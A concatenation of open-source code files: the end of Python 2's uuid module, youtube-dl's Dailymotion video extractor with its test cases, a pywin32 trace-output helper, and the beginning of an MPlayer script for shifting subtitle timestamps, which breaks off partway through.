of six integer fields (with 32-bit, 16-bit, 16-bit, 8-bit, 8-bit, and
48-bit values respectively) as an argument named 'fields', or a string
of 16 bytes (with all the integer fields in big-endian order) as an
argument named 'bytes', or a string of 16 bytes (with the first three
fields in little-endian order) as an argument named 'bytes_le', or a
single 128-bit integer as an argument named 'int'.
UUIDs have these read-only attributes:
bytes the UUID as a 16-byte string (containing the six
integer fields in big-endian byte order)
bytes_le the UUID as a 16-byte string (with time_low, time_mid,
and time_hi_version in little-endian byte order)
fields a tuple of the six integer fields of the UUID,
which are also available as six individual attributes
and two derived attributes:
time_low the first 32 bits of the UUID
time_mid the next 16 bits of the UUID
time_hi_version the next 16 bits of the UUID
clock_seq_hi_variant the next 8 bits of the UUID
clock_seq_low the next 8 bits of the UUID
node the last 48 bits of the UUID
time the 60-bit timestamp
clock_seq the 14-bit sequence number
hex the UUID as a 32-character hexadecimal string
int the UUID as a 128-bit integer
urn the UUID as a URN as specified in RFC 4122
variant the UUID variant (one of the constants RESERVED_NCS,
RFC_4122, RESERVED_MICROSOFT, or RESERVED_FUTURE)
version the UUID version number (1 through 5, meaningful only
when the variant is RFC_4122)
"""
def __init__(self, hex=None, bytes=None, bytes_le=None, fields=None,
int=None, version=None):
r"""Create a UUID from either a string of 32 hexadecimal digits,
a string of 16 bytes as the 'bytes' argument, a string of 16 bytes
in little-endian order as the 'bytes_le' argument, a tuple of six
integers (32-bit time_low, 16-bit time_mid, 16-bit time_hi_version,
8-bit clock_seq_hi_variant, 8-bit clock_seq_low, 48-bit node) as
the 'fields' argument, or a single 128-bit integer as the 'int'
argument. When a string of hex digits is given, curly braces,
hyphens, and a URN prefix are all optional. For example, these
expressions all yield the same UUID:
UUID('{12345678-1234-5678-1234-567812345678}')
UUID('12345678123456781234567812345678')
UUID('urn:uuid:12345678-1234-5678-1234-567812345678')
UUID(bytes='\x12\x34\x56\x78'*4)
UUID(bytes_le='\x78\x56\x34\x12\x34\x12\x78\x56' +
'\x12\x34\x56\x78\x12\x34\x56\x78')
UUID(fields=(0x12345678, 0x1234, 0x5678, 0x12, 0x34, 0x567812345678))
UUID(int=0x12345678123456781234567812345678)
Exactly one of 'hex', 'bytes', 'bytes_le', 'fields', or 'int' must
be given. The 'version' argument is optional; if given, the resulting
UUID will have its variant and version set according to RFC 4122,
overriding the given 'hex', 'bytes', 'bytes_le', 'fields', or 'int'.
"""
if [hex, bytes, bytes_le, fields, int].count(None) != 4:
raise TypeError('need one of hex, bytes, bytes_le, fields, or int')
if hex is not None:
hex = hex.replace('urn:', '').replace('uuid:', '')
hex = hex.strip('{}').replace('-', '')
if len(hex) != 32:
raise ValueError('badly formed hexadecimal UUID string')
int = long(hex, 16)
if bytes_le is not None:
if len(bytes_le) != 16:
raise ValueError('bytes_le is not a 16-char string')
bytes = (bytes_le[3] + bytes_le[2] + bytes_le[1] + bytes_le[0] +
bytes_le[5] + bytes_le[4] + bytes_le[7] + bytes_le[6] +
bytes_le[8:])
if bytes is not None:
if len(bytes) != 16:
raise ValueError('bytes is not a 16-char string')
int = long(('%02x' * 16) % tuple(map(ord, bytes)), 16)
if fields is not None:
if len(fields) != 6:
raise ValueError('fields is not a 6-tuple')
(time_low, time_mid, time_hi_version,
clock_seq_hi_variant, clock_seq_low, node) = fields
if not 0 <= time_low < 1 << 32L:
raise ValueError('field 1 out of range (need a 32-bit value)')
if not 0 <= time_mid < 1 << 16L:
raise ValueError('field 2 out of range (need a 16-bit value)')
if not 0 <= time_hi_version < 1 << 16L:
raise ValueError('field 3 out of range (need a 16-bit value)')
if not 0 <= clock_seq_hi_variant < 1 << 8L:
raise ValueError('field 4 out of range (need an 8-bit value)')
if not 0 <= clock_seq_low < 1 << 8L:
raise ValueError('field 5 out of range (need an 8-bit value)')
if not 0 <= node < 1 << 48L:
raise ValueError('field 6 out of range (need a 48-bit value)')
clock_seq = (clock_seq_hi_variant << 8L) | clock_seq_low
int = ((time_low << 96L) | (time_mid << 80L) |
(time_hi_version << 64L) | (clock_seq << 48L) | node)
if int is not None:
if not 0 <= int < 1 << 128L:
raise ValueError('int is out of range (need a 128-bit value)')
if version is not None:
if not 1 <= version <= 5:
raise ValueError('illegal version number')
# Set the variant to RFC 4122.
int &= ~(0xc000 << 48L)
int |= 0x8000 << 48L
# Set the version number.
int &= ~(0xf000 << 64L)
int |= version << 76L
self.__dict__['int'] = int
def __cmp__(self, other):
if isinstance(other, UUID):
return cmp(self.int, other.int)
return NotImplemented
def __hash__(self):
return hash(self.int)
def __int__(self):
return self.int
def __repr__(self):
return 'UUID(%r)' % str(self)
def __setattr__(self, name, value):
raise TypeError('UUID objects are immutable')
def __str__(self):
hex = '%032x' % self.int
return '%s-%s-%s-%s-%s' % (
hex[:8], hex[8:12], hex[12:16], hex[16:20], hex[20:])
def get_bytes(self):
bytes = ''
for shift in range(0, 128, 8):
bytes = chr((self.int >> shift) & 0xff) + bytes
return bytes
bytes = property(get_bytes)
def get_bytes_le(self):
bytes = self.bytes
return (bytes[3] + bytes[2] + bytes[1] + bytes[0] +
bytes[5] + bytes[4] + bytes[7] + bytes[6] + bytes[8:])
bytes_le = property(get_bytes_le)
def get_fields(self):
return (self.time_low, self.time_mid, self.time_hi_version,
self.clock_seq_hi_variant, self.clock_seq_low, self.node)
fields = property(get_fields)
def get_time_low(self):
return self.int >> 96L
time_low = property(get_time_low)
def get_time_mid(self):
return (self.int >> 80L) & 0xffff
time_mid = property(get_time_mid)
def get_time_hi_version(self):
return (self.int >> 64L) & 0xffff
time_hi_version = property(get_time_hi_version)
def get_clock_seq_hi_variant(self):
return (self.int >> 56L) & 0xff
clock_seq_hi_variant = property(get_clock_seq_hi_variant)
def get_clock_seq_low(self):
return (self.int >> 48L) & 0xff
clock_seq_low = property(get_clock_seq_low)
def get_time(self):
return (((self.time_hi_version & 0x0fffL) << 48L) |
(self.time_mid << 32L) | self.time_low)
time = property(get_time)
def get_clock_seq(self):
return (((self.clock_seq_hi_variant & 0x3fL) << 8L) |
self.clock_seq_low)
clock_seq = property(get_clock_seq)
def get_node(self):
return self.int & 0xffffffffffff
node = property(get_node)
def get_hex(self):
return '%032x' % self.int
hex = property(get_hex)
def get_urn(self):
return 'urn:uuid:' + str(self)
urn = property(get_urn)
def get_variant(self):
if not self.int & (0x8000 << 48L):
return RESERVED_NCS
elif not self.int & (0x4000 << 48L):
return RFC_4122
elif not self.int & (0x2000 << 48L):
return RESERVED_MICROSOFT
else:
return RESERVED_FUTURE
variant = property(get_variant)
def get_version(self):
# The version bits are only meaningful for RFC 4122 UUIDs.
if self.variant == RFC_4122:
return int((self.int >> 76L) & 0xf)
version = property(get_version)
def _find_mac(command, args, hw_identifiers, get_index):
import os
for dir in ['', '/sbin/', '/usr/sbin']:
executable = os.path.join(dir, command)
if not os.path.exists(executable):
continue
try:
# LC_ALL to get English output, 2>/dev/null to
# prevent output on stderr
cmd = 'LC_ALL=C %s %s 2>/dev/null' % (executable, args)
pipe = os.popen(cmd)
except IOError:
continue
for line in pipe:
words = line.lower().split()
for i in range(len(words)):
if words[i] in hw_identifiers:
return int(words[get_index(i)].replace(':', ''), 16)
return None
def _ifconfig_getnode():
"""Get the hardware address on Unix by running ifconfig."""
# This works on Linux ('' or '-a'), Tru64 ('-av'), but not all Unixes.
for args in ('', '-a', '-av'):
mac = _find_mac('ifconfig', args, ['hwaddr', 'ether'], lambda i: i + 1)
if mac:
return mac
import socket
ip_addr = socket.gethostbyname(socket.gethostname())
# Try getting the MAC addr from arp based on our IP address (Solaris).
mac = _find_mac('arp', '-an', [ip_addr], lambda i: -1)
if mac:
return mac
# This might work on HP-UX.
mac = _find_mac('lanscan', '-ai', ['lan0'], lambda i: 0)
if mac:
return mac
return None
def _ipconfig_getnode():
"""Get the hardware address on Windows by running ipconfig.exe."""
import os
import re
dirs = ['', r'c:\windows\system32', r'c:\winnt\system32']
try:
import ctypes
buffer = ctypes.create_string_buffer(300)
ctypes.windll.kernel32.GetSystemDirectoryA(buffer, 300)
dirs.insert(0, buffer.value.decode('mbcs'))
except:
pass
for dir in dirs:
try:
pipe = os.popen(os.path.join(dir, 'ipconfig') + ' /all')
except IOError:
continue
for line in pipe:
value = line.split(':')[-1].strip().lower()
if re.match('([0-9a-f][0-9a-f]-){5}[0-9a-f][0-9a-f]', value):
return int(value.replace('-', ''), 16)
def _netbios_getnode():
"""Get the hardware address on Windows using NetBIOS calls.
See http://support.microsoft.com/kb/118623 for details."""
import win32wnet
import netbios
ncb = netbios.NCB()
ncb.Command = netbios.NCBENUM
ncb.Buffer = adapters = netbios.LANA_ENUM()
adapters._pack()
if win32wnet.Netbios(ncb) != 0:
return
adapters._unpack()
for i in range(adapters.length):
ncb.Reset()
ncb.Command = netbios.NCBRESET
ncb.Lana_num = ord(adapters.lana[i])
if win32wnet.Netbios(ncb) != 0:
continue
ncb.Reset()
ncb.Command = netbios.NCBASTAT
ncb.Lana_num = ord(adapters.lana[i])
ncb.Callname = '*'.ljust(16)
ncb.Buffer = status = netbios.ADAPTER_STATUS()
if win32wnet.Netbios(ncb) != 0:
continue
status._unpack()
bytes = map(ord, status.adapter_address)
return ((bytes[0] << 40L) + (bytes[1] << 32L) + (bytes[2] << 24L) +
(bytes[3] << 16L) + (bytes[4] << 8L) + bytes[5])
# Thanks to Thomas Heller for ctypes and for his help with its use here.
# If ctypes is available, use it to find system routines for UUID generation.
_uuid_generate_random = _uuid_generate_time = _UuidCreate = None
try:
import ctypes
import ctypes.util
_buffer = ctypes.create_string_buffer(16)
# The uuid_generate_* routines are provided by libuuid on at least
# Linux and FreeBSD, and provided by libc on Mac OS X.
for libname in ['uuid', 'c']:
try:
lib = ctypes.CDLL(ctypes.util.find_library(libname))
except:
continue
if hasattr(lib, 'uuid_generate_random'):
_uuid_generate_random = lib.uuid_generate_random
if hasattr(lib, 'uuid_generate_time'):
_uuid_generate_time = lib.uuid_generate_time
# On Windows prior to 2000, UuidCreate gives a UUID containing the
# hardware address. On Windows 2000 and later, UuidCreate makes a
# random UUID and UuidCreateSequential gives a UUID containing the
# hardware address. These routines are provided by the RPC runtime.
# NOTE: at least on Tim's WinXP Pro SP2 desktop box, while the last
# 6 bytes returned by UuidCreateSequential are fixed, they don't appear
# to bear any relationship to the MAC address of any network device
# on the box.
try:
lib = ctypes.windll.rpcrt4
except:
lib = None
_UuidCreate = getattr(lib, 'UuidCreateSequential',
getattr(lib, 'UuidCreate', None))
except:
pass
def _unixdll_getnode():
"""Get the hardware address on Unix using ctypes."""
_uuid_generate_time(_buffer)
return UUID(bytes=_buffer.raw).node
def _windll_getnode():
"""Get the hardware address on Windows using ctypes."""
if _UuidCreate(_buffer) == 0:
return UUID(bytes=_buffer.raw).node
def _random_getnode():
"""Get a random node ID, with eighth bit set as suggested by RFC 4122."""
import random
return random.randrange(0, 1 << 48L) | 0x010000000000L
_node = None
def getnode():
"""Get the hardware address as a 48-bit positive integer.
The first time this runs, it may launch a separate program, which could
be quite slow. If all attempts to obtain the hardware address fail, we
choose a random 48-bit number with its eighth bit set to 1 as recommended
in RFC 4122.
"""
global _node
if _node is not None:
return _node
import sys
if sys.platform == 'win32':
getters = [_windll_getnode, _netbios_getnode, _ipconfig_getnode]
else:
getters = [_unixdll_getnode, _ifconfig_getnode]
for getter in getters + [_random_getnode]:
try:
_node = getter()
except:
continue
if _node is not None:
return _node
_last_timestamp = None
def uuid1(node=None, clock_seq=None):
"""Generate a UUID from a host ID, sequence number, and the current time.
If 'node' is not given, getnode() is used to obtain the hardware
address. If 'clock_seq' is given, it is used as the sequence number;
otherwise a random 14-bit sequence number is chosen."""
# When the system provides a version-1 UUID generator, use it (but don't
# use UuidCreate here because its UUIDs don't conform to RFC 4122).
if _uuid_generate_time and node is clock_seq is None:
_uuid_generate_time(_buffer)
return UUID(bytes=_buffer.raw)
global _last_timestamp
import time
nanoseconds = int(time.time() * 1e9)
# 0x01b21dd213814000 is the number of 100-ns intervals between the
# UUID epoch 1582-10-15 00:00:00 and the Unix epoch 1970-01-01 00:00:00.
timestamp = int(nanoseconds / 100) + 0x01b21dd213814000L
if timestamp <= _last_timestamp:
timestamp = _last_timestamp + 1
_last_timestamp = timestamp
if clock_seq is None:
import random
clock_seq = random.randrange(1 << 14L) # instead of stable storage
time_low = timestamp & 0xffffffffL
time_mid = (timestamp >> 32L) & 0xffffL
time_hi_version = (timestamp >> 48L) & 0x0fffL
clock_seq_low = clock_seq & 0xffL
clock_seq_hi_variant = (clock_seq >> 8L) & 0x3fL
if node is None:
node = getnode()
return UUID(fields=(time_low, time_mid, time_hi_version,
clock_seq_hi_variant, clock_seq_low, node), version=1)
def uuid3(namespace, name):
"""Generate a UUID from the MD5 hash of a namespace UUID and a name."""
try:
from hashlib import md5
except ImportError:
from md5 import md5
hash = md5(namespace.bytes + name).digest()
return UUID(bytes=hash[:16], version=3)
def uuid4():
"""Generate a random UUID."""
# When the system provides a version-4 UUID generator, use it.
if _uuid_generate_random:
_uuid_generate_random(_buffer)
return UUID(bytes=_buffer.raw)
# Otherwise, get randomness from urandom or the 'random' module.
try:
import os
return UUID(bytes=os.urandom(16), version=4)
except:
import random
bytes = [chr(random.randrange(256)) for i in range(16)]
return UUID(bytes=bytes, version=4)
def uuid5(namespace, name):
"""Generate a UUID from the SHA-1 hash of a namespace UUID and a name."""
try:
from hashlib import sha1 as sha
except ImportError:
from sha import sha
hash = sha(namespace.bytes + name).digest()
return UUID(bytes=hash[:16], version=5)
# The following standard UUIDs are for use with uuid3() or uuid5().
NAMESPACE_DNS = UUID('6ba7b810-9dad-11d1-80b4-00c04fd430c8')
NAMESPACE_URL = UUID('6ba7b811-9dad-11d1-80b4-00c04fd430c8')
NAMESPACE_OID = UUID('6ba7b812-9dad-11d1-80b4-00c04fd430c8')
NAMESPACE_X500 = UUID('6ba7b814-9dad-11d1-80b4-00c04fd430c8')
| agpl-3.0 |
vjmac15/Lyilis | lib/youtube_dl/extractor/dailymotion.py | 13 | 18180 | # coding: utf-8
from __future__ import unicode_literals
import re
import json
import itertools
from .common import InfoExtractor
from ..utils import (
determine_ext,
error_to_compat_str,
ExtractorError,
int_or_none,
parse_iso8601,
sanitized_Request,
str_to_int,
unescapeHTML,
mimetype2ext,
)
class DailymotionBaseInfoExtractor(InfoExtractor):
@staticmethod
def _build_request(url):
"""Build a request with the family filter disabled"""
request = sanitized_Request(url)
request.add_header('Cookie', 'family_filter=off; ff=off')
return request
def _download_webpage_handle_no_ff(self, url, *args, **kwargs):
request = self._build_request(url)
return self._download_webpage_handle(request, *args, **kwargs)
def _download_webpage_no_ff(self, url, *args, **kwargs):
request = self._build_request(url)
return self._download_webpage(request, *args, **kwargs)
class DailymotionIE(DailymotionBaseInfoExtractor):
_VALID_URL = r'(?i)https?://(?:(www|touch)\.)?dailymotion\.[a-z]{2,3}/(?:(?:(?:embed|swf|#)/)?video|swf)/(?P<id>[^/?_]+)'
IE_NAME = 'dailymotion'
_FORMATS = [
('stream_h264_ld_url', 'ld'),
('stream_h264_url', 'standard'),
('stream_h264_hq_url', 'hq'),
('stream_h264_hd_url', 'hd'),
('stream_h264_hd1080_url', 'hd180'),
]
_TESTS = [{
'url': 'http://www.dailymotion.com/video/x5kesuj_office-christmas-party-review-jason-bateman-olivia-munn-t-j-miller_news',
'md5': '074b95bdee76b9e3654137aee9c79dfe',
'info_dict': {
'id': 'x5kesuj',
'ext': 'mp4',
'title': 'Office Christmas Party Review – Jason Bateman, Olivia Munn, T.J. Miller',
'description': 'Office Christmas Party Review - Jason Bateman, Olivia Munn, T.J. Miller',
'thumbnail': r're:^https?:.*\.(?:jpg|png)$',
'duration': 187,
'timestamp': 1493651285,
'upload_date': '20170501',
'uploader': 'Deadline',
'uploader_id': 'x1xm8ri',
'age_limit': 0,
'view_count': int,
},
}, {
'url': 'https://www.dailymotion.com/video/x2iuewm_steam-machine-models-pricing-listed-on-steam-store-ign-news_videogames',
'md5': '2137c41a8e78554bb09225b8eb322406',
'info_dict': {
'id': 'x2iuewm',
'ext': 'mp4',
'title': 'Steam Machine Models, Pricing Listed on Steam Store - IGN News',
'description': 'Several come bundled with the Steam Controller.',
'thumbnail': r're:^https?:.*\.(?:jpg|png)$',
'duration': 74,
'timestamp': 1425657362,
'upload_date': '20150306',
'uploader': 'IGN',
'uploader_id': 'xijv66',
'age_limit': 0,
'view_count': int,
},
'skip': 'video gone',
}, {
# Vevo video
'url': 'http://www.dailymotion.com/video/x149uew_katy-perry-roar-official_musi',
'info_dict': {
'title': 'Roar (Official)',
'id': 'USUV71301934',
'ext': 'mp4',
'uploader': 'Katy Perry',
'upload_date': '20130905',
},
'params': {
'skip_download': True,
},
'skip': 'VEVO is only available in some countries',
}, {
# age-restricted video
'url': 'http://www.dailymotion.com/video/xyh2zz_leanna-decker-cyber-girl-of-the-year-desires-nude-playboy-plus_redband',
'md5': '0d667a7b9cebecc3c89ee93099c4159d',
'info_dict': {
'id': 'xyh2zz',
'ext': 'mp4',
'title': 'Leanna Decker - Cyber Girl Of The Year Desires Nude [Playboy Plus]',
'uploader': 'HotWaves1012',
'age_limit': 18,
},
'skip': 'video gone',
}, {
# geo-restricted, player v5
'url': 'http://www.dailymotion.com/video/xhza0o',
'only_matching': True,
}, {
# with subtitles
'url': 'http://www.dailymotion.com/video/x20su5f_the-power-of-nightmares-1-the-rise-of-the-politics-of-fear-bbc-2004_news',
'only_matching': True,
}, {
'url': 'http://www.dailymotion.com/swf/video/x3n92nf',
'only_matching': True,
}, {
'url': 'http://www.dailymotion.com/swf/x3ss1m_funny-magic-trick-barry-and-stuart_fun',
'only_matching': True,
}]
@staticmethod
def _extract_urls(webpage):
# Look for embedded Dailymotion player
matches = re.findall(
r'<(?:(?:embed|iframe)[^>]+?src=|input[^>]+id=[\'"]dmcloudUrlEmissionSelect[\'"][^>]+value=)(["\'])(?P<url>(?:https?:)?//(?:www\.)?dailymotion\.com/(?:embed|swf)/video/.+?)\1', webpage)
return list(map(lambda m: unescapeHTML(m[1]), matches))
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage_no_ff(
'https://www.dailymotion.com/video/%s' % video_id, video_id)
age_limit = self._rta_search(webpage)
description = self._og_search_description(webpage) or self._html_search_meta(
'description', webpage, 'description')
view_count_str = self._search_regex(
(r'<meta[^>]+itemprop="interactionCount"[^>]+content="UserPlays:([\s\d,.]+)"',
r'video_views_count[^>]+>\s+([\s\d\,.]+)'),
webpage, 'view count', default=None)
if view_count_str:
view_count_str = re.sub(r'\s', '', view_count_str)
view_count = str_to_int(view_count_str)
comment_count = int_or_none(self._search_regex(
r'<meta[^>]+itemprop="interactionCount"[^>]+content="UserComments:(\d+)"',
webpage, 'comment count', default=None))
player_v5 = self._search_regex(
[r'buildPlayer\(({.+?})\);\n', # See https://github.com/rg3/youtube-dl/issues/7826
r'playerV5\s*=\s*dmp\.create\([^,]+?,\s*({.+?})\);',
r'buildPlayer\(({.+?})\);',
r'var\s+config\s*=\s*({.+?});',
# New layout regex (see https://github.com/rg3/youtube-dl/issues/13580)
r'__PLAYER_CONFIG__\s*=\s*({.+?});'],
webpage, 'player v5', default=None)
if player_v5:
player = self._parse_json(player_v5, video_id)
metadata = player['metadata']
self._check_error(metadata)
formats = []
for quality, media_list in metadata['qualities'].items():
for media in media_list:
media_url = media.get('url')
if not media_url:
continue
type_ = media.get('type')
if type_ == 'application/vnd.lumberjack.manifest':
continue
ext = mimetype2ext(type_) or determine_ext(media_url)
if ext == 'm3u8':
formats.extend(self._extract_m3u8_formats(
media_url, video_id, 'mp4', preference=-1,
m3u8_id='hls', fatal=False))
elif ext == 'f4m':
formats.extend(self._extract_f4m_formats(
media_url, video_id, preference=-1, f4m_id='hds', fatal=False))
else:
f = {
'url': media_url,
'format_id': 'http-%s' % quality,
'ext': ext,
}
m = re.search(r'H264-(?P<width>\d+)x(?P<height>\d+)', media_url)
if m:
f.update({
'width': int(m.group('width')),
'height': int(m.group('height')),
})
formats.append(f)
self._sort_formats(formats)
title = metadata['title']
duration = int_or_none(metadata.get('duration'))
timestamp = int_or_none(metadata.get('created_time'))
thumbnail = metadata.get('poster_url')
uploader = metadata.get('owner', {}).get('screenname')
uploader_id = metadata.get('owner', {}).get('id')
subtitles = {}
subtitles_data = metadata.get('subtitles', {}).get('data', {})
if subtitles_data and isinstance(subtitles_data, dict):
for subtitle_lang, subtitle in subtitles_data.items():
subtitles[subtitle_lang] = [{
'ext': determine_ext(subtitle_url),
'url': subtitle_url,
} for subtitle_url in subtitle.get('urls', [])]
return {
'id': video_id,
'title': title,
'description': description,
'thumbnail': thumbnail,
'duration': duration,
'timestamp': timestamp,
'uploader': uploader,
'uploader_id': uploader_id,
'age_limit': age_limit,
'view_count': view_count,
'comment_count': comment_count,
'formats': formats,
'subtitles': subtitles,
}
# vevo embed
vevo_id = self._search_regex(
r'<link rel="video_src" href="[^"]*?vevo.com[^"]*?video=(?P<id>[\w]*)',
webpage, 'vevo embed', default=None)
if vevo_id:
return self.url_result('vevo:%s' % vevo_id, 'Vevo')
# fallback old player
embed_page = self._download_webpage_no_ff(
'https://www.dailymotion.com/embed/video/%s' % video_id,
video_id, 'Downloading embed page')
timestamp = parse_iso8601(self._html_search_meta(
'video:release_date', webpage, 'upload date'))
info = self._parse_json(
self._search_regex(
r'var info = ({.*?}),$', embed_page,
'video info', flags=re.MULTILINE),
video_id)
self._check_error(info)
formats = []
for (key, format_id) in self._FORMATS:
video_url = info.get(key)
if video_url is not None:
m_size = re.search(r'H264-(\d+)x(\d+)', video_url)
if m_size is not None:
width, height = map(int_or_none, (m_size.group(1), m_size.group(2)))
else:
width, height = None, None
formats.append({
'url': video_url,
'ext': 'mp4',
'format_id': format_id,
'width': width,
'height': height,
})
self._sort_formats(formats)
# subtitles
video_subtitles = self.extract_subtitles(video_id, webpage)
title = self._og_search_title(webpage, default=None)
if title is None:
title = self._html_search_regex(
r'(?s)<span\s+id="video_title"[^>]*>(.*?)</span>', webpage,
'title')
return {
'id': video_id,
'formats': formats,
'uploader': info['owner.screenname'],
'timestamp': timestamp,
'title': title,
'description': description,
'subtitles': video_subtitles,
'thumbnail': info['thumbnail_url'],
'age_limit': age_limit,
'view_count': view_count,
'duration': info['duration']
}
def _check_error(self, info):
error = info.get('error')
if info.get('error') is not None:
title = error['title']
# See https://developer.dailymotion.com/api#access-error
if error.get('code') == 'DM007':
self.raise_geo_restricted(msg=title)
raise ExtractorError(
'%s said: %s' % (self.IE_NAME, title), expected=True)
def _get_subtitles(self, video_id, webpage):
try:
sub_list = self._download_webpage(
'https://api.dailymotion.com/video/%s/subtitles?fields=id,language,url' % video_id,
video_id, note=False)
except ExtractorError as err:
self._downloader.report_warning('unable to download video subtitles: %s' % error_to_compat_str(err))
return {}
info = json.loads(sub_list)
if (info['total'] > 0):
sub_lang_list = dict((l['language'], [{'url': l['url'], 'ext': 'srt'}]) for l in info['list'])
return sub_lang_list
self._downloader.report_warning('video doesn\'t have subtitles')
return {}
class DailymotionPlaylistIE(DailymotionBaseInfoExtractor):
IE_NAME = 'dailymotion:playlist'
_VALID_URL = r'(?:https?://)?(?:www\.)?dailymotion\.[a-z]{2,3}/playlist/(?P<id>.+?)/'
_MORE_PAGES_INDICATOR = r'(?s)<div class="pages[^"]*">.*?<a\s+class="[^"]*?icon-arrow_right[^"]*?"'
_PAGE_TEMPLATE = 'https://www.dailymotion.com/playlist/%s/%s'
_TESTS = [{
'url': 'http://www.dailymotion.com/playlist/xv4bw_nqtv_sport/1#video=xl8v3q',
'info_dict': {
'title': 'SPORT',
'id': 'xv4bw_nqtv_sport',
},
'playlist_mincount': 20,
}]
def _extract_entries(self, id):
video_ids = set()
processed_urls = set()
for pagenum in itertools.count(1):
page_url = self._PAGE_TEMPLATE % (id, pagenum)
webpage, urlh = self._download_webpage_handle_no_ff(
page_url, id, 'Downloading page %s' % pagenum)
if urlh.geturl() in processed_urls:
self.report_warning('Stopped at duplicated page %s, which is the same as %s' % (
page_url, urlh.geturl()), id)
break
processed_urls.add(urlh.geturl())
for video_id in re.findall(r'data-xid="(.+?)"', webpage):
if video_id not in video_ids:
yield self.url_result(
'http://www.dailymotion.com/video/%s' % video_id,
DailymotionIE.ie_key(), video_id)
video_ids.add(video_id)
if re.search(self._MORE_PAGES_INDICATOR, webpage) is None:
break
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
playlist_id = mobj.group('id')
webpage = self._download_webpage(url, playlist_id)
return {
'_type': 'playlist',
'id': playlist_id,
'title': self._og_search_title(webpage),
'entries': self._extract_entries(playlist_id),
}
class DailymotionUserIE(DailymotionPlaylistIE):
IE_NAME = 'dailymotion:user'
_VALID_URL = r'https?://(?:www\.)?dailymotion\.[a-z]{2,3}/(?!(?:embed|swf|#|video|playlist)/)(?:(?:old/)?user/)?(?P<user>[^/]+)'
_PAGE_TEMPLATE = 'http://www.dailymotion.com/user/%s/%s'
_TESTS = [{
'url': 'https://www.dailymotion.com/user/nqtv',
'info_dict': {
'id': 'nqtv',
'title': 'Rémi Gaillard',
},
'playlist_mincount': 100,
}, {
'url': 'http://www.dailymotion.com/user/UnderProject',
'info_dict': {
'id': 'UnderProject',
'title': 'UnderProject',
},
'playlist_mincount': 1800,
'expected_warnings': [
'Stopped at duplicated page',
],
'skip': 'Takes too long time',
}]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
user = mobj.group('user')
webpage = self._download_webpage(
'https://www.dailymotion.com/user/%s' % user, user)
full_user = unescapeHTML(self._html_search_regex(
r'<a class="nav-image" title="([^"]+)" href="/%s">' % re.escape(user),
webpage, 'user'))
return {
'_type': 'playlist',
'id': user,
'title': full_user,
'entries': self._extract_entries(user),
}
class DailymotionCloudIE(DailymotionBaseInfoExtractor):
_VALID_URL_PREFIX = r'https?://api\.dmcloud\.net/(?:player/)?embed/'
_VALID_URL = r'%s[^/]+/(?P<id>[^/?]+)' % _VALID_URL_PREFIX
_VALID_EMBED_URL = r'%s[^/]+/[^\'"]+' % _VALID_URL_PREFIX
_TESTS = [{
# From http://www.francetvinfo.fr/economie/entreprises/les-entreprises-familiales-le-secret-de-la-reussite_933271.html
# Tested at FranceTvInfo_2
'url': 'http://api.dmcloud.net/embed/4e7343f894a6f677b10006b4/556e03339473995ee145930c?auth=1464865870-0-jyhsm84b-ead4c701fb750cf9367bf4447167a3db&autoplay=1',
'only_matching': True,
}, {
# http://www.francetvinfo.fr/societe/larguez-les-amarres-le-cobaturage-se-developpe_980101.html
'url': 'http://api.dmcloud.net/player/embed/4e7343f894a6f677b10006b4/559545469473996d31429f06?auth=1467430263-0-90tglw2l-a3a4b64ed41efe48d7fccad85b8b8fda&autoplay=1',
'only_matching': True,
}]
@classmethod
def _extract_dmcloud_url(cls, webpage):
mobj = re.search(r'<iframe[^>]+src=[\'"](%s)[\'"]' % cls._VALID_EMBED_URL, webpage)
if mobj:
return mobj.group(1)
mobj = re.search(
r'<input[^>]+id=[\'"]dmcloudUrlEmissionSelect[\'"][^>]+value=[\'"](%s)[\'"]' % cls._VALID_EMBED_URL,
webpage)
if mobj:
return mobj.group(1)
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage_no_ff(url, video_id)
title = self._html_search_regex(r'<title>([^>]+)</title>', webpage, 'title')
video_info = self._parse_json(self._search_regex(
r'var\s+info\s*=\s*([^;]+);', webpage, 'video info'), video_id)
# TODO: parse ios_url, which is in fact a manifest
video_url = video_info['mp4_url']
return {
'id': video_id,
'url': video_url,
'title': title,
'thumbnail': video_info.get('thumbnail_url'),
}
| gpl-3.0 |
chvrga/outdoor-explorer | java/play-1.4.4/python/Lib/site-packages/win32/lib/win32traceutil.py | 9 | 1528 | # This is a helper for the win32trace module
# If imported from a normal Python program, it sets up sys.stdout and sys.stderr
# so output goes to the collector.
# If run from the command line, it creates a collector loop.
# Eg:
# C:>start win32traceutil.py (or python.exe win32traceutil.py)
# will start a process with a (pretty much) blank screen.
#
# then, switch to a DOS prompt, and type:
# C:>python.exe
# Python 1.4 etc...
# >>> import win32traceutil
# Redirecting output to win32trace remote collector
# >>> print "Hello"
# >>>
# And the output will appear in the first collector process.
# Note - the client or the collector can be started first.
# There is a 0x20000 byte buffer. If this gets full, it is reset, and new
# output appended from the start.
import win32trace
def RunAsCollector():
import sys
try:
import win32api
win32api.SetConsoleTitle("Python Trace Collector")
except:
pass # Oh well!
win32trace.InitRead()
print "Collecting Python Trace Output..."
try:
while 1:
# a short timeout means ctrl+c works next time we wake...
sys.stdout.write(win32trace.blockingread(500))
except KeyboardInterrupt:
print "Ctrl+C"
def SetupForPrint():
win32trace.InitWrite()
try: # Under certain servers, sys.stdout may be invalid.
print "Redirecting output to win32trace remote collector"
except:
pass
win32trace.setprint() # this works in an rexec environment.
if __name__=='__main__':
RunAsCollector()
else:
SetupForPrint()
| mit |
hawken93/mplayerhq | TOOLS/vobshift.py | 71 | 1048 | #!/usr/bin/env python
#usage:
#
# vobshift.py in.idx out.idx -8.45
#
# this will read in in.idx,shift it by 8.45 seconds back,
# and save it as out.idx
#
# license: i don't care ;)
#
import datetime
import sys
def tripletize(line):
begin = line[:11]
middle = line[11:23]
end = line[23:]
return (begin,middle,end)
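# For illustration, a typical .idx timestamp line this script rewrites looks
# like (example values only):
#
#     timestamp: 00:02:10:149, filepos: 000001aa2
#
# tripletize() returns the text before the timestamp (chars 0-10), the
# 12-character hh:mm:ss:mmm timestamp itself, and the rest of the line.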
def text2delta(t):
h = int( t[0:2] )
m = int( t[3:5] )
s = int( t[6:8] )
milli = int( t[9:12] )
return datetime.timedelta(hours=h,minutes=m,seconds=s,milliseconds=milli)
def delta2text(d):
t = str(d)
milli = t[8:11]
if len(milli) == 0: #fix for .000 seconds
milli = '000'
